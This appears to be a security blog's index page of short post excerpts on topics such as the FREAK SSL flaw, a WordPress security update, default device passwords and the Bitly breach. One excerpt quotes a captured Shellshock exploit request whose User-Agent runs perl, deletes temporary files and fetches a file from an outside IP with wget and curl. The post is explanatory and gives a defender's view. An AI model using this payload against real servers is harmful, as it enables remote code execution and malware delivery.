General

Do you know what makes the Internet so slow?

According to some online sources, PORN is what uses around 30% of the Internet’s bandwidth. Why do I care about this? Because the top searches in my news portal IT Security News (www.itsecuritynews.info) are: nude videos, porn and naked pictures of celebrities. I guess we are living in a very … lonely world. This is also how […]

General News

Why security recommendations often get ignored

I read very often about vulnerabilities and companies that got hacked. Many times, the reason they got hacked was that some recommendations issued by some smart people (read: security-minded people) were ignored. But why are they ignored? I found some articles where several explanations are given for what is called “information avoidance”. […]

General

What a Shellshock exploit attempt looks like

One of my HTTP servers hosted on an Amazon EC2 regularly receives strange requests like these: One such request looks like this: GET /cgi-bin/php5 HTTP/1.1 Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: () { :;};/usr/bin/perl -e ‘print “Content-Type: text/plainrnrnXSUCCESS!”;system(“cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; curl -O http://109.228.25.87/.c.txt ; […]

General News

FREAK: All Windows versions are affected too

UPDATE on the FREAK vulnerability in SSL: it affects not only Android and iOS but all Windows versions too. I wrote about the new SSL vulnerability called FREAK – Factoring RSA Export Keys – which affects around 36% of all sites trusted by browsers and around 10% of the Alexa top one million domains, according to […]

General

WordPress 4.0.1 update – important security fixes

All my blogs use WordPress. Why WordPress? Because it is customizable and I can tweak it in any way I want… Well, almost… But from time to time there is the need to update it. Yesterday the update 4.0.1 was released, which fixes important security bugs: Three cross-site scripting issues that a contributor or author […]

General

Change default passwords on your Internet-enabled devices

Useless to write again about changing default passwords? Think again… I just bought two brand-new TP-Link WiFi Range Extenders, models WA860RE and WA854RE. Latest version, latest firmware. Both come with default username and password: admin. It is written on their back… Once you log in, you will go through a wizard which configures the device. But, it […]

General

Improve your browser’s security and privacy in 5 steps

No matter which source for statistics you take, all agree that the most used browsers are Chrome, Firefox and Internet Explorer. There have been many studies and tests done to find out which is the most secure of them. However, the tests are only able to show how each browser matches a set of […]

General

Link shortening service Bitly hacked, users asked to reset credentials

Link shortening service Bitly late Thursday announced it has suffered a data breach, and urged all users to reset their credentials. Bitly’s CEO wrote in the blog post that they have “reasons to believe that Bitly account credentials have been compromised; specifically, users’ email addresses, encrypted passwords, API keys and OAuth tokens”. This is really bad because it […]